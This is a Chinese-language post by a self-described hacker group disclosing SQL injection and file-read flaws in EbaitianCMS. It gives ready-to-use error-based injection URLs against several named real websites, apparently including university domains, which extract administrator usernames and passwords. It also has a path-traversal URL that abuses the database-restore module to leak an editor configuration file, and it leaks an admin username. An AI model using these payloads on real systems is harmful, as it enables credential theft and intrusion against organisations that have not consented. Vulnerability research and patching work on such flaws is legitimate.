作者：YoCo Smart 来自：Silic Group Hacker Army http://blackbap.org

经测试，此漏洞官网(www.ebaitian.cn)也有，而且官网的更加严重。。。
测试版本：
EbaitianCMS For PHP V2011Beta3.2
EbaitianCMS For PHP V2012Beta5.2
EbaitianCMS For PHP V2012CN6.0
EbaitianCMS 官方网站
漏洞文件：
很多。。。举个(栗)子。。。

http://jwc.cjxy.edu.cn/class.jsp?bigclassid=9&smallclassid=0+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+concat(username,0x5f,password)+from+ebt_admin+limit+2,1))a+from+information_schema.tables+group+by+a)b%23

http://cjxytsg.home51.net:81/class.jsp?bigclassid=9&smallclassid=0+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+concat(username,0x5f,password)+from+ebt_admin+limit+0,1))a+from+information_schema.tables+group+by+a)b%23

http://jwc.ezu.cn/show.php?id=0+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+concat(username,0x5f,password)+from+ebt_admin+limit+0,1))a+from+information_schema.tables+group+by+a)b%23

直接错误回显注入套公式得到管理员登陆信息

 

 

 

 

后台登陆地址在前台页脚有

这是版本为：PHP V2012Beta5.2的后台登陆后的页面

 

 

 

 

 

 

 

这是版本为：PHP V2012CN6.0的后台登陆后的页面

 

 

 

 

 

后台的ewebeditor编辑器，默认后台未删除：
http://www.ebaitian.cn/ebaitiancn/ebteditor/admin/login.php
登陆后台后，可以使用后台数据库操作的，数据库备份恢复程序来读取服务器的配置文件
数据库恢复 模块工作原理：通过GET取得sql文件名称，系统不做任何检查，将文件载入MySQL并执行语句
如果GET获取的SQL备份文件是php代码文件，SQL将报错，并将php文件代码的前几行爆出
因此可以使用该模块的：

http://www.ebaitian.cn/ebaitiancn/module/databases/ebaitian_datapress.php?action=rebackup&f=../ebteditor/php/config.php

来读取ewebeditor的配置文件
这里读得：

$sUsername = "ebtadmin"

密码自由想象

通过测试，V5.2和V3.2版本的程序，ewebeditor的加密config文件都是文字游戏编码加密过的，而官网的6.0版本则是明文。

官网都如此的不值得信赖。。。真悲催